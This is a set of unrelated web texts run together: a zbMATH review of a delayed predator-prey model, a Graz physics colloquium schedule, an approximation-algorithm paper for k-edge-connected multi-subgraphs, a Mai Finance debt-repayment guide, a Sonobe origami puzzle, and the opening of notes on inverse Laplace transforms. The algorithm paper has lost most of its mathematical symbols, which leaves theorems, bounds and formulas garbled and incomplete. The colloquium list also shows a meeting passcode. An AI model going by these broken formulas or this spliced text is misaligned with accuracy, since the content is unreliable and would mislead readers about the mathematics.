a & b logic and a | b logic or !ab logic not abc* right wildcard "ab c" phrase (ab c) parentheses
##### Fields
any anywhere an internal document identifier au author, editor ai internal author identifier ti title la language so source ab review, abstract py publication year rv reviewer cc MSC code ut uncontrolled term dt document type (j: journal article; b: book; a: book article)
Stability and Hopf bifurcations in a delayed Leslie-Gower predator-prey system. (English) Zbl 1170.34051
The delayed Leslie - Gower (LG) predator - prey system $$x^{\prime}(t) = r_1 x(t) \biggl (1 - \frac{x(t-\tau)}{K} \biggr ) - m x(t) y(t),$$ $$y^{\prime}(t) = r_2 y(t) \biggl (1 - \frac{y(t)}{\gamma x(t)} \biggr )$$ is studied. The delay $\tau$ is considered as the bifurcation parameter and the characteristic equation of the linearized system of the original system at the positive equilibrium is analysed. It is shown that Hopf bifurcations can occur as the delay crosses some critical values. The main contribution of this paper is that the linear stability of the system is investigated and Hopf bifurcations are demonstrated. Conditions ensuring the existence of global Hopf bifurcation are given, i.e., when $r_1 > 2mK\gamma,$ LG system has at least $j$ periodic solutions for $\tau > \tau_j^{+} (j\geq 1).$ The formulae determining the direction of the bifurcations and the stability of the bifurcating periodic solutions are given by using the normal form theory and center manifold theorem. The numerical simulations are also included. Basing on the global Hopf bifurcation result by {\it J. Wu} [Trans. Am. Math. Soc. 350, No. 12, 4799--4838 (1998; Zbl 0905.34034)] for functional differential equations, the authors demonstrate the global existence of periodic solutions.
##### MSC:
34K18 Bifurcation theory of functional differential equations 34K60 Qualitative investigation and simulation of models 92D25 Population dynamics (general) 34K13 Periodic solutions of functional differential equations 34K20 Stability theory of functional-differential equations
Full Text:
##### References:
[1] Wu, J.: Symmetric functional differential equations and neural networks with memory, Trans. amer. Math. soc. 350, 4799-4838 (1998) · Zbl 0905.34034 · doi:10.1090/S0002-9947-98-02083-2 [2] Braza, P. A.: The bifurcation structure of the Holling -- tanner model for predator -- prey interactions using two-timing, SIAM J. Appl. math. 63, 898-904 (2003) · Zbl 1035.34043 · doi:10.1137/S0036139901393494 [3] Collings, J. B.: Bifurcation and stability analysis for a temperature-dependent mite predator -- prey interaction model incorporating a prey refuge, Bull. math. Biol. 57, 63-76 (1995) · Zbl 0810.92024 [4] Hsu, S. B.; Huang, T. W.: Global stability for a class of predator -- prey systems, SIAM J. Appl. math. 55, 763-783 (1995) · Zbl 0832.34035 · doi:10.1137/S0036139993253201 [5] Hsu, S. B.; Huang, T. W.: Hopf bifurcation analysis for a predator -- prey system of Holling and Leslie type, Taiwanese J. Math. 3, 35-53 (1999) · Zbl 0935.34035 [6] May, R. M.: Stability and complexity in model ecosystems, (1974) [7] Tanner, J. T.: The stability and the intrinsic growth rates of prey and predator populations, Ecology 56, 855-867 (1975) [8] Cushing, J. M.: Integrodifferential equations and delay models in population dynamics, (1977) · Zbl 0363.92014 [9] Gopalsamy, K.: Harmless delay in model systems, Bull. math. Biol. 45, 295-309 (1983) · Zbl 0514.34060 [10] Kuang, Y.: Delay differential equations with applications in population dynamics, (1993) · Zbl 0777.34002 [11] Beretta, E.; Kuang, Y.: Convergence results in a well-known delayed predator -- prey system, J. math. Anal. appl. 204, 840-853 (1996) · Zbl 0876.92021 · doi:10.1006/jmaa.1996.0471 [12] Beretta, E.; Kuang, Y.: Global analysis in some delayed ratio-dependent predator -- prey systems, Nonlinear anal. 32, 381-408 (1998) · Zbl 0946.34061 · doi:10.1016/S0362-546X(97)00491-4 [13] Faria, T.; Magalháes, L. T.: Normal form for retarded functional differential equations and applications to bogdanov-Takens singularity, J. differential equations 122, 201-224 (1995) · Zbl 0836.34069 · doi:10.1006/jdeq.1995.1145 [14] Gopalsamy, K.: Delayed responses and stability in two-species systems, J. austral. Math. soc. (Ser. B) 25, 473-500 (1984) · Zbl 0552.92016 · doi:10.1017/S0334270000004227 [15] Gopalsamy, K.: Stability and oscillations in delay differential equations of population dynamics, (1992) · Zbl 0752.34039 [16] May, R. M.: Time delay versus stability in population models with two and three trophic levels, Ecology 4, 315-325 (1973) [17] Song, Y.; Wei, J.: Local Hopf bifurcation and global periodic solutions in a delayed predator -- prey system, J. math. Anal. appl. 301, 1-21 (2005) · Zbl 1067.34076 · doi:10.1016/j.jmaa.2004.06.056 [18] Xiao, D.; Ruan, S.: Multiple bifurcations in a delayed predator -- prey system with nonmonotonic functional response, J. differential equations 176, 494-510 (2001) · Zbl 1003.34064 · doi:10.1006/jdeq.2000.3982 [19] Liu, Z.; Yuan, R.: Stability and bifurcation in a delayed predator -- prey system with beddington -- deangelis functional response, J. math. Anal. appl. 296, 521-537 (2004) · Zbl 1051.34060 · doi:10.1016/j.jmaa.2004.04.051 [20] Hutchinson, G. E.: Circular cause systems in ecology, Ann. New York acad. Sci. 50, 221-246 (1948) [21] Leslie, P. H.; Gower, J. C.: The properties of a stochastic model for the predator -- prey type of interaction between two species, Biometrika 47, 219-234 (1960) · Zbl 0103.12502 [22] Faria, T.; Magalháes, L. T.: Normal form for retarded functional differential equations with parameters and applications to Hopf bifurcation, J. differential equations 122, 181-200 (1995) · Zbl 0836.34068 · doi:10.1006/jdeq.1995.1144 [23] Chow, S. -N.; Hale, J. K.: Methods of bifurcation theory, (1982) · Zbl 0487.47039 [24] Yan, X.; Li, W.: Hopf bifurcation and global periodic solutions in a delayed predator -- prey system, Appl. math. Comput. 177, 427-445 (2006) · Zbl 1090.92052 · doi:10.1016/j.amc.2005.11.020 [25] Yan, X.; Zhang, C.: Hopf bifurcation in a delayed lokta -- Volterra predator -- prey system, Nonlinear anal. Real world appl. 9, 114-127 (2008) · Zbl 1149.34048 · doi:10.1016/j.nonrwa.2006.09.007 |
Karl Franzens University Graz Graz University of Technology
## TUG/KFU Physics Colloquium Summer 2021
Tuesday 02 March 2021 KFU - Online (Zoom) 16:15 - 17:15 Physics and Applications of Epsilon-Near-Zero MaterialsRobert W. Boyd, University of Ottawa In this talk, we describe some of the properties of light propagation through a material for which the dielectric permittivity, and hence the refractive index, is nearly vanishing. Among other unusual optical properties, we find that such epsilon-near-zero (ENZ) materials display ... moreVideo: https://us02web.zoom.us/j/81876426812 Tuesday 09 March 2021 TUG online 16:15 - 17:15 2D and 3D SEM-based electron diffraction techniques as central tools for correlative microscopy to obtain new insights into microstructure physics and chemistryStefan Zaefferer, Max Planck Institute for Iron Research Duesseldorfhttps://www.mpie.de/2890931/microscopy_and_diffraction The scanning electron microscope (SEM) offers two electron diffraction techniques that allow to obtain comprehensive and quantitative information about the crystalline microstructure of materials, namely electron backscatter diffraction (EBSD) with all its facets and variations, ... moreVideo: https://tugraz.webex.com/meet/gerald.kothleitner Tuesday 23 March 2021 TUG - Online 16:15 - 17:15 Amon based Quantum Machine LearningAnatole von Lilienfeld, University Viennahttps://www.chemspacelab.org/head-of-lab/ Many of the most relevant observables of matter depend explicitly on atomistic and electronic details, rendering a first principles approach to computational materials design mandatory. Alas, even when using high-performance computers, brute force high-throughput screening of mat ... more Tuesday 20 April 2021 Graz University of Technology, remote - online 16:15 - 17:15 Nanoporous materials for hydrogen isotope separationDr. Michael Hirscher, Max-Planck-Institut für Intelligente Systeme (ehemals Max-Planck-Institut für Metallforschung), Stuttgarthttps://mms.is.mpg.de/research_fields/hydrogen-storage One of the important operations in chemical industry is separation and purification of gaseous products. Especially H$_2$/D$_2$ isotope separation is a difficult task since its size, shape and thermodynamic properties resemble each other. Porous materials offer two different mech ... moreVideo: https://tugraz.webex.com/tugraz/j.php?MTID=m515e47db70524775a7f5460d95f963c6 Tuesday 27 April 2021 KFU HS 5.01 16:15 - 17:15 Quantum magnonics - Quantum optics with magnonsSilvia Viola-Kusminskiy, Max Planck Institute for the Science of Light In the last five years, a new field has emerged at the intersection between Condensed Matter and Quantum Optics, denominated “Quantum Magnonics”. This field strives to control the elementary excitation of magnetic materials, denominated magnons, to the level of the single quanta, ... moreVideo: https://us02web.zoom.us/j/84587309911 Tuesday 04 May 2021 Graz University of Technology, remote - online 16:15 - 17:15 Laser Picoscopy: Seeing valence electrons in solids with sub-Angstrom resolutionProf. Dr. Eleftherios Goulielmakis, University of Rostock The wavelength of visible light is often assumed to impose a fundamental frontier in optical microscopy. Indeed, the Abbe limit constrains the resolution of optical techniques to tens or hundreds of nanometers and makes visible light inadequate for electron-level imaging of the m ... moreVideo: https://1drv.ms/u/s!AtN8DP2nnqYUgbUOvP3tZpwlIdly9A?e=0TSst3 Tuesday 11 May 2021 KFU - Online 16:15 - 17:15 Momentum-Space Movies of Electrons at Interfaces and in 2D SemiconductorsUlrich Höfer, University Marburg Time-resolved photoemission combines femtosecond pump-probe techniques with angle-resolved photoelectron spectroscopy (ARPES). New opportunities for this powerful technique arise in combination with THz excitation on one hand and ultrashort XUV probe pulses on the other hand. I w ... more Tuesday 18 May 2021 Graz University of Technology - remote online 16:15 - 17:15 Developments in High Speed Structural Imaging of Low Dimensional MaterialsProf. Angus Kirkland, University of Oxford I will describe recent work using high speed direct electron detectors and artificial intelligence / machine learning to automatically map defect transitions in graphene. I will also discuss the use of similar detectors in electron ptychography, in particular under extremely low ... more Tuesday 08 June 2021 TUG - Online 16:15 - 17:15 Polymer Films, Structures, and Devices by Initiated and Oxidative Chemical Vapor DepositionKenneth K. S. Lau, Department of Chemical and Biological Engineering, Drexel University Chemical vapor deposition (CVD) is a non-conventional route for constructing polymers as thin films, non-planar structures, and integrated devices. Polymer thin films are conventionally formed through liquid phase processing, like dip coating, spray coating and spin casting. Like ... moreVideo: https://1513041.mediaspace.kaltura.com/media/TU+Graz+-+Colloquium+Talk/1_f86g9afn Tuesday 15 June 2021 KFU - Online 16:15 - 17:15 Embedded many-body perturbation theory for the electronic properties of organic systemsXavier Blase, Institut Néel, CNRS, Grenoble, France Many-body perturbation theories, such as the GW and Bethe-Salpeter formalisms, have become a tool of choice in solid-state physics for studying the optoelectronic properties of crystals. Difficulties arise when attempting to explore with such techniques extended disordered system ... moreVideo: https://unimeet.uni-graz.at/b/pus-von-6fm-19m Tuesday 22 June 2021 TUG - Online 16:15 - 17:15 Focused Electron/Ion Beam Induced deposition for the growth of metallic, magnetic and superconducting nanostructuresJosé María De Teresa , Universidad de Zaragoza, Spain Today, nanolithography is a key enabling technology in various research and application fields. Focused Electron/Ion Beam Induced Deposition (FEBID/FIBID) nanolithography techniques stand out for the growth of functional nanomaterials with high-resolution, and their use is widesp ... moreVideo: https://felmi-zfe.webex.com/felmi-zfe-de/j.php?MTID=m1b23b6c2b772b0e44bf7c2dad2930131 Passwort: U4qDmmNQu54 Tuesday 29 June 2021 KFU - Online 16:15 - 17:15 TBAPeter Hommelhoff , Friedrich-Alexander-University Erlangen |
# An Improved Approximation Algorithm for the Minimum k-Edge Connected Multi-Subgraph Problem
We give a randomized 1+√(8ln k/k)-approximation algorithm for the minimum k-edge connected spanning multi-subgraph problem, k-ECSM.
## Authors
• 6 publications
• 4 publications
• 20 publications
• 5 publications
• ### Minimum 2-vertex-twinless connected spanning subgraph problem
Given a 2-vertex-twinless connected directed graph G=(V,E), the minimum ...
01/11/2020 ∙ by Raed Jaberi, et al. ∙ 0
• ### 5/4-Approximation of Minimum 2-Edge-Connected Spanning Subgraph
We provide a 5/4-approximation algorithm for the 2-edge connected spanni...
11/17/2019 ∙ by Ali Çivril, et al. ∙ 0
• ### An Õ(log^2 n)-approximation algorithm for 2-edge-connected dominating set
In the Connected Dominating Set problem we are given a graph G=(V,E) and...
12/20/2019 ∙ by Amir Belgi, et al. ∙ 0
• ### A Simple Primal-Dual Approximation Algorithm for 2-Edge-Connected Spanning Subgraphs
We propose a very simple and natural approximation algorithm for the pro...
08/14/2018 ∙ by Stephan Beyer, et al. ∙ 0
• ### Fast Biconnectivity Restoration in Multi-Robot Systems for Robust Communication Maintenance
Maintaining a robust communication network plays an important role in th...
11/02/2020 ∙ by Guangyao Shi, et al. ∙ 0
• ### The Matching Augmentation Problem: A 7/4-Approximation Algorithm
We present a 7/4 approximation algorithm for the matching augmentation p...
10/17/2018 ∙ by Joe Cheriyan, et al. ∙ 0
• ### p-Edge/Vertex-Connected Vertex Cover: Parameterized and Approximation Algorithms
We introduce and study two natural generalizations of the Connected Vert...
09/17/2020 ∙ by Carl Einarson, et al. ∙ 0
##### This week in AI
Get the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.
## 1 Introduction
In an instance of the minimum -edge connected subgraph problem, or -ECSS, we are given an (undirected) graph with vertices and a cost function , and we want to choose a minimum cost set of edges such that the subgraph is -edge connected. In its most general form, -ECSS generalizes several extensively-studied problems in network design such as tree augmentation or cactus augmentation. The -edge-connected multi-subgraph problem, -ECSM, is a close variant of -ECSS in which we want to choose a -edge-connected multi-subgraph of of minimum cost, i.e., we can choose an edge multiple times. It turns out that one can assume without loss of generality that the cost function in -ECSM is a metric, i.e., for any three vertices , we have .
Around four decades ago, Fredrickson and Jájá [FJ81, FJ82] designed a 2-approximation algorithm for -ECSS and a 3/2-approximation algorithm for -ECSM. The latter essentially follows by a reduction to the well-known Christofides-Serdyukov approximation algorithm for the traveling salesperson problem (TSP). Over the last four decades, despite a number of papers on the problem [JT00, KR96, Kar99, Gab05, GG08, GGTW09, Pri11, LOS12], the aforementioned approximation factors were only improved in the cases where the underlying graph is unweighted or . Most notably, Gabow, Goemans, Tardos and Williamson [GGTW09] showed that if the graph is unweighted then -ECSS and -ECSM admit approximation algorithms, i.e., as the approximation factor approaches 1. The special case of -ECSM where received significant attention and better than -approximation algorithms were designed for special cases [CR98, BFS16, SV14, BCCGISW20].
Motivated by [GGTW09], Pritchard posed the following conjecture:
###### Conjecture 1.1 ([Pri11]).
The -ECSM problem admits a approximation algorithm.
In other words, if true, the above conjecture implies that the 3/2-classical factor is not optimal for sufficiently large , and moreover that it is possible to design an approximation algorithm whose factor gets arbitrarily close to 1 as . In this paper, we prove a weaker version of the above conjecture.
###### Theorem 1.2 (Main).
There is a randomized algorithm for (weighted) -ECSM with approximation factor (at most) .
We remark that our main theorem only improves the classical 3/2-approximation algorithm for -ECSM only when (although one can use the more precise expression given in the proof to, for example, improve upon 3/2 for even values of ).
For a set , let denote the set of edges leaving
. The following is the natural linear programming relaxation for
-ECSM.
min ∑e∈Exec(e) (1) s.t. x(δ(v))=k ∀v∈V x(δ(S))≥k ∀S⊆V xe≥0 ∀e∈E.
Note that while in an optimum solution of -ECSM the degree of each vertex is not necessarily equal to , since the cost function satisfies the triangle inequality we may assume that in any optimum fractional solution each vertex has (fractional) degree . This follows from the parsimonious property [gb93].
We prove Theorem 1.2 by rounding an optimum solution to the above linear program. So, as a corollary we also upper-bound the integrality gap of the above linear program.
###### Corollary 1.3.
The integrality gap of LP (1) is at most .
### 1.1 Proof Overview
Before explaining our algorithm, we recall a randomized rounding approach of Karger [Kar99]. Karger showed that if we choose every edge
independently with probability
, then the sample is -edge connected with high probability. He then fixes the connectivity of the sample by adding copies of the minimum spanning tree of . This gives a approximation algorithm for the problem.
First, we observe that where is a solution to the LP (1
), the vector
is in the spanning tree polytope (after modifying slightly, see creftype 2.1 for more details). Following a recent line of works on the traveling salesperson problem [OSS11, KKO20b] we write as a -uniform spanning tree distribution, . Then, we independently sample spanning trees111If
is odd, we sample
trees. The bound remains unchanged relative to the analysis we give below as the potential cost of one extra tree is .
. It follows that has the same expectation across every cut as , and due to properties of -uniform spanning tree distributions it is concentrated around its mean. Unlike the independent rounding procedure, has at least edges across each cut with probability 1. This implies that the number of “bad” cuts of , i.e. those of size strictly less than , is at most (with probability 1). This is because any tree has strictly less than 2 edges in exactly -“tree cuts,” and a cut lying on no tree cuts must have at least edges in .
We divide these potentially bad cuts into two types: (i) Cuts such that and (ii) Cuts where , for some . We fix all cuts of type (i) by adding copies of the minimum spanning tree of . To fix cuts of type (ii), we employ the following procedure: for any tree where and is of type (ii), we add one extra copy of the unique edge of in . To bound the expected cost of our rounded solution, we use the concentration property of -uniform trees on edges of to show that the probability any fixed cut is of type (ii) is exponentially small in , , even if we condition on for a single tree .
### 1.2 Algorithm
For two sets of edges , we write to denote the multi-set union of and allowing multiple edges. Note that we always have .
Let be an optimal solution of LP (1). We expand the graph to a graph by picking an arbitrary vertex , splitting it into two nodes and , and then, for every edge incident to , assigning fraction to each of the two edges and in . Call this expanded graph , its edge set , and the resulting fractional solution , where and are identical on all other edges. (Note that each of and now have fractional degree in .) In creftype 2.1 below, we show that is in the spanning tree polytope for the graph . For ease of exposition, the algorithm is described as running on (and spanning trees222A spanning tree in is a 1-tree in , that is, a tree plus an edge. of ), which has the same edge set as (when and are identified).
Our algorithm is as follows:
## 2 Preliminaries
For any set of edges and a set of edges , we write
FT:=|F∩T|.
Also, for any edge weight function , we write .
For any spanning tree of , and any edge , we write to denote the set of edges in the unique cut obtained by deleting from . Of particular interest to us below will be where is an edge in .
### 2.1 Random Spanning Trees
Edmonds [Edm70] gave the following description for the convex hull of the spanning trees of any graph , known as the spanning tree polytope.
z(E)=|V|−1 (2) z(E(S))≤|S|−1 ∀S⊆V ze≥0 ∀e∈E.
Edmonds also [Edm70] proved that the extreme point solutions of this polytope are the characteristic vectors of the spanning trees of .
###### Fact 2.1 ([KKO20b]).
Let be the optimal solution of LP (1) and its extension to as described above. Then is in the spanning tree polytope (2) of .
###### Proof.
For any set with , . If , then , so Finally, if , then . Thus, . The claim follows because
Given nonnegative edge weights , we say a distribution over spanning trees of is -uniform, if for any spanning tree ,
PT∼μλ[T]∝∏e∈Tλ(e).
###### Theorem 2.2 ([Agmos17]).
There is a polynomial-time algorithm that, given a connected graph , and a point in the spanning tree polytope (2) of , returns such that the corresponding -uniform spanning tree distribution satisfies
∑T∈T:e∈Tμλ(T)≤(1+2−n)ze, ∀e∈E,
i.e., the marginals are approximately preserved. In the above is the set of all spanning trees of .
### 2.2 Bernoulli-Sum Random Variables
###### Definition 2.3 (Bernoulli-Sum Random Variable).
We say is a Bernoulli-Sumrandom variable if it has the law of a sum of independent Bernoullis, say for some , with .
###### Fact 2.4.
If and are two independent Bernoulli-sum random variables then .
###### Lemma 2.5 ([Bbl09, Pit97]).
Given and , let be the -uniform spanning tree distribution of . Let be a sample from . Then for any fixed , the random variable is distributed as .
###### Theorem 2.6 (Multiplicative Chernoff-Hoeffding Bound for BS Random Variables).
Let be a Bernoulli-Sum random variable. Then, for any and
P[X<(1−ϵ)q′]≤e−ϵ2q′2.
## 3 Analysis of the Algorithm
In this section we prove Theorem 1.2. We first observe that the cuts of are precisely the cuts of that have and on the same side of the cut, and for any such cut the set of edges crossing the cut in and in is the same (once and are contracted). We begin by showing that the output of Algorithm 1 is -edge connected (in ) with probability 1.
###### Lemma 3.1 (k-Connectivity of the Output).
For any , the output of Algorithm 1, is a -edge connected subgraph of .
###### Proof.
Fix spanning trees in and let for some , where . We show that . If , then since has copies of the minimum spanning tree, and we are done. Otherwise . Then, we know that for any tree , either or . If , since , has one extra copy of the unique edge of in . Therefore, including those cases where an extra copy of the edge is added, each has at least two edges in , so as desired. ∎
###### Lemma 3.2.
For any , , and any ,
P[CTi(e)T∗≤k−α√k/2−1|e∈Ti∧(u0,v0)∉CTi(e)]≤e−α2/2.
where the randomness is over spanning trees independently sampled from .
###### Proof.
Condition on tree such that and (.
By Lemma 2.5, for any such that , is a random variable, with . Also, by definition, (with probability 1). Since are independently chosen, by creftype 2.4 the random variable is distributed as for . Since each has at least one edge in , with probability 1. So, by Theorem 2.6, with , when ,
P[CTi(e)T∗
Averaging over all realizations of satisfying the required conditions proves the lemma. ∎
###### Proof of Theorem 1.2.
Let be an optimum solution of LP (1). Since the output of the algorithm is always -edge connected we just need to show . By linearity of expectation,
E[c(T∗)]=∑i∈[k2]E[c(Ti)]=k2∑e∈Ec(e)Pμλ[e]=k2∑e∈Ec(e)⋅2k⋅xe=c(x),
where for simplicity we ignored the loss in the marginals. On the other hand, since by creftype 2.1, is in the spanning tree polytope of , . It remains to bound the expected cost of . By Lemma 3.2, we have,
E[c(F)] =∑e∈Ec(e)k/2∑i=1P[e∈Ti∧(u0,v0)∉CTi(e)]P[CTi(e)T∗
Putting these together we get, Setting finishes the proof. ∎ |
Debt repayment - How?
This page will present different options to repay your debt on Mai Finance. Keep in mind that repaying a debt is never mandatory as long as you want to keep your loan, and don't need your collateral.
The market is on a bull run and your crypto, locked in the Vault, is gaining more and more value, so much that you decided to sell it. However, because it's in the Vault on Mai Finance, you can't totally unlock it unless you repay your loan.
The market is bearish, and your crypto is losing value very quickly. You don't generate yield fast enough to cover up the damages and keep an healthy Collateral to Debt Ratio (CDR), and liquidation is near. It's time to repay your debt to make sure you're not losing too much, and prevent liquidation.
If you are not in any of the above situation, it's probably not worth repaying your debt. Please see the chapter on Debt Repayment for more details.
# Partial or Full repayment using fiat
The most direct way to repay your debt is to use some fiat, especially if you want to keep your collateral and other investments untouched.
Mai Finance is partnering with Transak to easily bridge money bought by Credit / Debit Cards, or bank transfers, directly to the Polygon network. Simply head to Mai Finance and click the transak icon in the menu bar to open a modal that will let you purchase some MATIC and send them directly to your Polygon wallet.
Buying some USDC from fiat and bridging to Polygon directly
The main issue is the time taken to process the transaction. However, doing so will let you swap USDC for MAI and then partially or fully repay your debt.
# Repayment using the benefits of your loan
## Partial Repayment
Most people will want to borrow MAI on Mai Finance in order to invest into specific projects. Yield farmers that are using MAI will most probably be successful generating additional resources and will hopefully not lose money on degen farms. If you're in that case, you have 2 options
• repay your loan with the generated revenue
• re-invest your gains into the same (or another) project
In most cases, it's probably better to re-invest your gains. Indeed, by compounding your rewards, APR (Annual Percentage Revenue) is applied on a bigger amount, which in turns generates more revenue. See our investment guides to get ideas on how you can maximize your investments.
However, some people simply don't like the idea of having a debt, and will want to repay it as quickly as possible. If that's your case, you can simply swap your gains into MAI, and repay your debt.
• Select the Manage option
• Select the Repay tab at the bottom of your Vault
• Enter any amount you want to repay
• Click Repay MAI and you're done
Partially repaying a portion of my debt
As an example
• You have $1,000.00 worth of camWMATIC in your vault, with a debt of$400.00
• You swapped $10.00 worth of ADDY tokens for MAI • You repay$10.00 today
## Main idea
On Mai Finance, you can borrow MAI stable coins by depositing a certain amount of collateral in a vault. The collateral to debt ratio needs to always be above a certain threshold, 150% for most vaults. This means, for a 150% CDR, that for any $100 worth of collateral, you can only borrow$66.6667 of MAI.
However, this would directly put you in a liquidation position. This means that the health of your vault is considered too risky, and anyone can repay a portion of your debt using their funds and get paid back by getting a portion of your collateral. For more details about liquidation, please read the official documentation.
It's usually considered best practice to keep a high collateral to debt ratio to prevent liquidation, but even with a CDR close to 150%, it's easy to see that the value of the collateral is ALWAYS bigger than the value of the debt. This means that you can, in theory, repay your debt by selling some of your collateral asset.
## How to use collateral
Let's consider a vault with $1,000.00 worth of MATIC and a$500.00 debt. The CDR is 200%. The minimum CDR is 150%. In this example, we want to repay the debt completely, but we want to avoid liquidation, and we will try to never go bellow a 160% CDR when withdrawing our collaterals. We will be using the following formulas:
$CDR=\frac{Collateral}{Debt}$
$AvailableCollateral = InitialCollateral - TargetCDR*Debt$
In this situation, if we want to keep a CDR of 160%, the amount of collateral we can withdraw "safely" is
Hence, we will have to proceed in multiple steps:
• Withdraw $200 from the collateral • the vault now has$800 worth of MATIC and $500 of debt, CDR is 160% • Sell the$200 worth of collateral to buy MAI
• Repay $200 of the debt with a 0.5% repayment fee • the vault now has$799 worth of MATIC and $300 of debt, CDR is 266.33% • Calculate the new amount of collateral we can withdraw:$319
• Withdraw $319 from the collateral • the vault now has$480 of MATIC and $300 of debt, CDR is 160% • Sell the$319 worth of collateral to buy MAI
• Repay $300 of the debt with a 0.5% repayment fee • the vault has$478.50 worth of MATIC and $0 of debt, and you still have$19 of MAI
You can see that keeping a healthy CDR can greatly help you repay your debt with very little number of loops. Of course, if your CDR is closer to the 150% limit, you may have to operate more loops since you cannot withdraw as much at once.
A collateral to debt ratio of 260% is enough to be able to withdraw the total amount of your debt and stay above 160% CDR. This way, you only need one loop to fully repay your debt.
Note that fully repaying your debt by selling your collateral is never necessary if you don't need to sell your underlying assets, or to modify your CDR and keep your vault from being liquidated.
# Repayment using a robot
This paragraph is pure theory and is there only for advanced programmers. The idea is to use flash loans that will help you repay your debt and unlock the collateral so that it can be paid. Flash loans are an option proposed by some applications on different networks, including Polygon, that allow you to borrow funds and repay the loan in the same transaction block. If the loan cannot be fully repaid within the same block, the transaction is simply reverted. On Polygon, AAVE is proposing flash loans.
If we take the example above with $1,000.00 worth of MATIC and a debt of$500.00. The flow would be as follows:
• Borrow $600.00 of USDC on AAVE in a flash loan • Swap the USDC for MAI • Repay your debt completely • Withdraw your MATIC collateral • Sell your MATIC for USDC • Repay the AAVE flash loan When submitted, this list of transactions will all happen in the same block, and you will end up with whatever is left from your MATIC as USDC in your wallet (more or less$500.00, with some slight variations due to flash loan interest rate, swap fees, and repayment fees).
Right now, you would have to interact directly with the smart contracts, which requires some good understanding of how they work. If you need help, you can find some on our Discord server where there's a programming channel. Maybe in a near future, FuruCombo will propose Mai Finance bricks that would allow you to operate this directly using their graphic tool, but for now it's not possible. Finally, the idea of a button to "repay debt using collateral" has been proposed to the team of devs of Mai Finance, and the option may be implemented in the future.
# Short term VS Long term Debt Repayments
Depending on your strategy and the way you feel regarding your debt, it may be a good idea to compare different lending platforms. However, keep in mind that Mai Finance with its 0% interest and 0.5% repayment fee is one of the top product on the Polygon market. The real competitor is AAVE, but only if you want to borrow MAI or USDC for a short period of time.
• Mais is 0% interest + 0.5% repayment fee
• AAVE has no repayment fees, but a variable APR for interests you need to pay back
Supplying and Borrowing APY on AAVE as of August 2021
As an example for USDC, you can see that the borrowing rate is 3.79% with a current reward of 2.08% paid back in MATIC. This gives, at the moment of writing, the equivalent of 1.71% you need to pay back if you keep your loan for a complete year. With AAVE, since you can repay your debt very quickly, the variable APY is equivalent to 0.005% daily. Hence, it would take 100 days (a bit more than 3 months) to reach 0.5% of your debt.
If you plan to keep your loan longer than that, it's definitely better to use Mai Finance. Also, it's important to understand that AAVE borrowing APRs are variable, they will fluctuate with the amounts that are deposited and required (the more people want to borrow from AAVE, the higher the borrowing APR). Keep also in mind that the MATIC reward program will end at some point, and the 1.71% interest will soon become a 3.79% interest rate. At least with Mai Finance, you don't have to keep a close eye on your loan to see when it becomes dangerous to keep it.
Finally, the team of Mai Finance is working on Vaults incentives that would work the same way as the MATIC reward, meaning that you would still get a 0% interest loan and a bonus paid in Qi that may very well reduce the repayment fee to 0% of your debt. And the longer you keep your loan, the more reward you will collect, making it a true negative interest loan.
# Disclaimer
The views, thoughts, and opinions expressed in the text belong solely to the author, and not necessarily to the rest of the community, nor the development team behind Mai Finance. It should not be taken as a financial advice or guidance of any kind.
Keep in mind that a strategy that works well at a given time may perform poorly (or make you lose money) at another time. Please stay informed, monitor the markets, keep an eye on your investments, and as always, do your own research. |
## Sonobe puzzler 2: How many units?
This is the second of three puzzlers for the Sonobe lover. The first is here; for partial background, see my earlier posts [1, 2, 3, gallery] on the Sonobe unit.
Consider the following origami construction. How many Sonobe units is it made of?
Keep reading for a few hints.
Hint #1: four of the corners have broken underlying geometry. (See the links at the top of this post to understand what this means.) In particular, the dark blue units have been folded perpendicular to their ribs, along their pockets, instead of vice-versa. Without this twist, the construction would look like a cube.
Hint #2: following Hint #1, let’s talk about cubes. There are several different ways to make a cube from Sonobe units:
In these images, the leftmost cube is made from six units; its underlying geometry is that of the tetrahedron. The second and third cubes from the left are made from twelve units each. In this case, the underlying geometry is actually that of a cube, and we use the flat square faces mentioned in the third image here. In the second cube, the units are “inside-out,” with the pockets on the interior of the cube and the ribs visible along the edges. In the third cube, they are “right-side out.” (If you try to make this yourself, which is not difficult, you’ll notice that this requires you to fold the “wrong way” along the rib.) In the rightmost cube, made from twenty-four units, the underlying geometry is that of a cuboctahedron.
The flat square faces and the faces of the triangular pyramids constructed on the equilateral triangular faces are coplanar.
The cube that underlies the mystery construction is the same size as the twenty-four unit cube just mentioned, but it’s easy to see that it’s constructed differently. In fact, it uses more than twenty-four units.
Hint #3: one can understand the geometry of this polyhedron by understanding the A3 lattice, the tetrahedral-octahedral honeycomb, or the hyperplane arrangement consisting of the planes $\pm x \pm y \pm z = 1$ (or the larger arrangement $x \pm y \pm z \in 2\mathbb{Z} + 1$). |
• Go To
• Notes
• Practice and Assignment problems are not yet written. As time permits I am working on them, however I don't have the amount of free time that I used to so it will take a while before anything shows up here.
• Show/Hide
• Show all Solutions/Steps/etc.
• Hide all Solutions/Steps/etc.
Paul's Online Notes
Home / Differential Equations / Laplace Transforms / Inverse Laplace Transforms
Show Mobile Notice Show All Notes Hide All Notes
Mobile Notice
You appear to be on a device with a "narrow" screen width (i.e. you are probably on a mobile phone). Due to the nature of the mathematics on this site it is best views in landscape mode. If your device is not in landscape mode many of the equations will run off the side of your device (should be able to scroll to see them) and some of the menu items will be cut off due to the narrow screen width.
### Section 4-3 : Inverse Laplace Transforms
Finding the Laplace transform of a function is not terribly difficult if we’ve got a table of transforms in front of us to use as we saw in the last section. What we would like to do now is go the other way.
We are going to be given a transform, $$F(s)$$, and ask what function (or functions) did we have originally. As you will see this can be a more complicated and lengthy process than taking transforms. In these cases we say that we are finding the Inverse Laplace Transform of $$F(s)$$ and use the following notation.
$f\left( t \right) = {\mathcal{L}^{\, - 1}}\left\{ {F\left( s \right)} \right\}$
As with Laplace transforms, we’ve got the following fact to help us take the inverse transform.
#### Fact
Given the two Laplace transforms $$F(s)$$ and $$G(s)$$ then
${\mathcal{L}^{\, - 1}}\left\{ {aF\left( s \right) + bG\left( s \right)} \right\} = a{\mathcal{L}^{\, - 1}}\left\{ {F\left( s \right)} \right\} + b{\mathcal{L}^{\, - 1}}\left\{ {G\left( s \right)} \right\}$
for any constants $$a$$ and $$b$$.
So, we take the inverse transform of the individual transforms, put any constants back in and then add or subtract the results back up.
Let’s take a look at a couple of fairly simple inverse transforms.
Example 1 Find the inverse transform of each of the following.
